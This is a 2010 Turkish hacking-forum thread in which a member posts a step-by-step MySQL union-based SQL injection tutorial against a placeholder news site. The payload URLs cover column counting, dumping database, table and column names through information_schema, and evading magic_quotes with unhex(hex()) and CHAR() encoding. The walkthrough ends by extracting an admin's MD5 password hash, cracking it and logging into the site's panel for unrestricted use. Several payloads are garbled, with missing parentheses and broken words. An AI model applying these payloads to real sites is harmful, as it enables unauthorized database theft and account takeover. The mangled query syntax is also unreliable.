THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Deep MySQL Injection

TRNooNTR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2008
Nereden:
drwxr-xr-x
Mesajlar:
2.521
Konular:
605
Teşekkür (Etti):
220
Teşekkür (Aldı):
1024
Ticaret:
(0) %
22-11-2010 00:09
#1
Deep MySQL Injection
Öncelikle merhaba bir öğretme azmi geldi bir döküman yazayımda arkdaşlarımla paylaşıyım dedim neyse lafı fazla uzatmadan başlayalım.

Bu dökümanımda sizlere mysql injection detaylarını göstericem inebildiğim kadarıyla .
Öncelikle bilmenizi isterim ki mysql injection olayında update yoktur sadece verileri okuyabilirsiniz örneğin admin id pass alırsınız panele girer basarsınız mesela.

Örnek Site :

color=#0000cc http://www.sitemiz.com/haber.php?id=8

Şimdi hata verdirmeye çalışalım.

color=#0000cc http://www.sitemiz.com/haber.php?id=8 yaptık.

Böyle bir haber kaydı bulunamadı. diyor (mesela)

Site sonuna

and 1=0 eklersek hata vermesi
and 1=1 eklersek normal açılması lazım.

Yapıyoruz..

color=#0000cc http://www.sitemiz.com/haber.php?id=8 and 1=0 hata verdi
color=#0000cc http://www.sitemiz.com/haber.php?id=8 and 1=1 normal açıldı

Başlıyoruz öncelikle kolon sayısını bulmamız lazım bunun için.

Order+by kullanıcaz ama nasıl ?

color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1 gibi
Bişey yok sonuna "--" ekliyoruz .
color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+1-- yapıyoruz sayfa normal açıldı bir problem yok.
color=#0000cc http://www.sitemiz.com/haber.php?id=8+order+by+2-- yapıyoruz hata verdi.

Bundan şu sonucu çıkartıyoruz colon sayısı 1 şimdi işe koyuluyoruz.
color=#0000cc http://www.sitemiz.com/haber.php?id=8+union+select+1-- bakın -- unutmayalım.
Birşey yok neden yok haber.php?id= den sonra - koymadım şöle.

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+1--

Evet 1 ekrana vurdu.Aşama aşama devam edelim ..

1.DataBase adlarını çekelim.

Bunun için ekrana vuran sayının yerine

group_concat(schema_name)
yazıyoruz ve en sonra +from+information_schmea.schemata yazıyoruz şöle.

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatschema_name+from+inform ation_schmea.schemata--
Birşey vurmadı yaptığımız işden de eminiz sorun ne ?

Sorun magic_quotes_gpc peki napıcaz ?

Unhex(hex()) metodunu uyguluyacaz ve

sayının yerine yazdığımız group_concat(schema_name) i

unhex(hex(group_concat(schema_name))) yapıcaz

deniyelim.

h color=#0000cc ttp://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatschema_name+fro m+information_schema.schemata--
evet

Tablo adlarını öğreneceğiz

gene aynı yerden bu sefer grop_concat(schema_name) i
group_concat(table_name)

olarak değiştiriyoruz yani şöle.

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name)))
sonunada

+from+information_schema.tables yazıyoruz ve tam olarak

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from +information_schema.tables-- oldu
sonunda -- unutmayalım .

evet tablolar geldi ama alakasız tabloalr geldi napcaz.

sonunda +where+table_name=database() ekliyicez

sonuç ;

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concattable_name+from +information_schema.tables+where+table_name=databa se()
evet tablolar ekrana yansıdı

Bir tablo adı seçiyoruz örneğin admin var diyelim

hemen adminin kolonlarını çekicez

gene aynı bu sefer aynı yeri group_concat(column_name) oarlak değiştirip sonuna
+from+information_schema.columns+where+table_name= CHAR(97, 100, 109, 105, 110, 108, 101, 114)--
ekliyoruz olmadı ?

Neden magic_quates_gpc açık napıcaz adminler i charlıcaz yani ?
adminler=CHAR(97, 100, 109, 105, 110, 108, 101, 114) bu olucak nasıl mysql char haline getirirsiniz ? firefox hackarbar eklentisi bunu yapabilir en basitinden

evet şimdi url böle oldu

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+unhexhexgroup_concatcolounm_name+fr om+information_schema.columns+where+table_name=CHA R97, 100, 109, 105, 110, 108, 101, 114)--
evet geldi ekrana neymiş

kad ve sifre kolonları varmış şimdi onlardaki verileri çekelim

color=#0000cc http://www.sitemiz.com/haber.php?id=-8+union+select+group_concatkad,0x3a,sifre+from+adm inler-- yapıyoruz
buradaki 0x3a ";" hex halidir şaşırtmasın

evet ekrana geldi
kullanıcı adı admin sifre md5 halde

admin:21232f297a57a5a743894a0e4a801fc3:

şimdi bunu herhangi bi şekilde kırıyoruz şifre "admin" miş
panele girip login oluyoruz ordan gerisi sizin fanteziniz ne yaparsanız yapın.

Selametle arkadaşlar..


Alıntıdır.
---------------------
Kod:
Sanal aleme ara verdim.
Uzunca bir süre online olmayacağım.
Allaha emanet olun.

By TRNooNTR
Kod:
I took a break the virtual realm.
 Will not be online for a long time.
 Be entrusted to God.

 By TRNooNTR
hackerkont - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2008
Mesajlar:
266
Konular:
5
Teşekkür (Etti):
43
Teşekkür (Aldı):
30
Ticaret:
(0) %
22-11-2010 19:45
#2
teşekkürler güzel paylaşım...

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler